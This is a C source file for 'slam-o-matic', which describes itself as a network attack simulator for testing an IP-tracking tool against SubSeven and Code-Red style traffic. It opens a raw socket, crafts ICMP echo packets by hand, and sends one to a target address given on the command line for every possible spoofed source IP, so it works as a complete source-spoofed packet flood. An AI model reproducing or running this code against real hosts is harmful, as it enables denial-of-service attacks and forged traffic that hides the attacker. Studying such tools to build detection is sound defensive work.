/***************************************************************************
****************************************************************************
****************************************************************************
* slam-o-matic- iptrk subseven, code-red network attack simulator
* By Jason Nunn <jsno@arafura.net.au>
* 2003, Arafura Connect
*
* =======================================================================
* IP packet (from RFC 791)-
*
*  0                   1                   2                   3   
*  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
* |Version|  IHL  |Type of Service|          Total Length         |
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
* |         Identification        |Flags|      Fragment Offset    |
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
* |  Time to Live |    Protocol   |         Header Checksum       |
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
* |                       Source Address                          |
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
* |                    Destination Address                        |
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
* |                    Options                    |    Padding    |
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
*
* ICMP packet (from RFC 792)-
*
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
* |     Type      |     Code      |          Checksum             |
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
* |                             unused                            |
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
* |      Internet Header + 64 bits of Original Data Datagram      |
* +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
*
****************************************************************************
****************************************************************************
****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>
#include <sys/times.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

#define PRIVATE static
#define PUBLIC

#define IP_SIZE         20
#define ICMP_SIZE       8
#define DATA_64BIT_SIZE 8

#define STR_LEN        256
#define STR_LEN_SMALL  40

#define IP_BUFSIZE     2048

#define s_int32_t      unsigned long

int                    sock = -1;
u_int16_t              ip_id;
struct sockaddr_in     sock_addr;

/***************************************************************************
*
***************************************************************************/
void error(const char *func, char *msg)
{
  char str[STR_LEN + 1];

  strcpy(str, func);
  strcat(str, msg);
  perror(str);
  exit(-1);
}

/***************************************************************************
* based on checksum routine in ping.c
***************************************************************************/
u_int16_t checksum(u_int16_t *buf, int len)
{
  s_int32_t sum = 0;

  while(len > 1)
  {
    sum += *buf++;
    len -= 2;
  }
  if(len == 1)
    sum += htons(*(u_int8_t *)buf << 8);

  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  return (u_int16_t)(~sum);
}

/***************************************************************************
*
***************************************************************************/
void open_sock(void)
{
  int x = 1;

  ip_id = getpid();

  memset((char *)&sock_addr, 0, sizeof(struct sockaddr_in));
  sock_addr.sin_family = AF_INET;

  sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if(sock == -1)
    error(__func__, "::socket(sock)");

  if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&x, sizeof(int)) == -1)
    error(__func__, "::setsockopt(IPPROTO_IP, IP_HDRINCL)");
}

void close_sock(void)
{
  if(sock == -1)
    return;
  close(sock);
  sock = -1;
}

/***************************************************************************
*
***************************************************************************/
void xmit_packet(u_int32_t src, u_int32_t dst)
{
  int             t;
  struct ip       *ip_p;
  struct icmp     *icmp_p;
  u_int8_t        *data_p;
  static u_int8_t packet[IP_BUFSIZE];

  memset(packet, 0, IP_SIZE + ICMP_SIZE);
  ip_p = (struct ip *)packet;
  icmp_p = (struct icmp *)(packet + IP_SIZE);
  data_p = ((u_int8_t *)icmp_p) + ICMP_SIZE;

  icmp_p->icmp_type = ICMP_ECHO;
  icmp_p->icmp_code = 0;
  icmp_p->icmp_cksum =           /*ICMP + (IP + 64bits of data)*/
    checksum((u_int16_t *)icmp_p, ICMP_SIZE + (IP_SIZE + 8));

  ip_p->ip_hl = 5;
  ip_p->ip_v = 4;
  ip_p->ip_tos = IPTOS_RELIABILITY;
  t = IP_SIZE + ICMP_SIZE + (IP_SIZE + 8);
  ip_p->ip_len = htons(t);
  ip_p->ip_id = htons(ip_id);
  ip_id++;
  ip_p->ip_ttl = 127;
  ip_p->ip_p = IPPROTO_ICMP;
  ip_p->ip_src.s_addr = src;
  ip_p->ip_dst.s_addr = dst;
  ip_p->ip_sum = checksum((u_int16_t *)ip_p, IP_SIZE);

  sock_addr.sin_addr = ip_p->ip_dst;
  sendto(sock, (char *)packet, t, 0,
    (struct sockaddr *)&sock_addr, sizeof(struct sockaddr_in));
}

/***************************************************************************
*
***************************************************************************/
int main(int argc, char *argv[])
{
  struct in_addr in;
  u_int32_t      src;

  printf("slam-o-matic- iptrk subseven, code-red network attack simulator\n");
  printf("By Jason Nunn <jsno@arafura.net.au>\n\n");

  if(argc != 2)
  {
    printf("Options: slam-o-matic <addr>\n\n");
    exit(-1);
  }

  inet_aton(argv[1], &in);
  open_sock();
  for(src = 0; src != 0xffffffff; src++)
    xmit_packet(htonl(src), in.s_addr);
  close_sock();

  return 0;
}
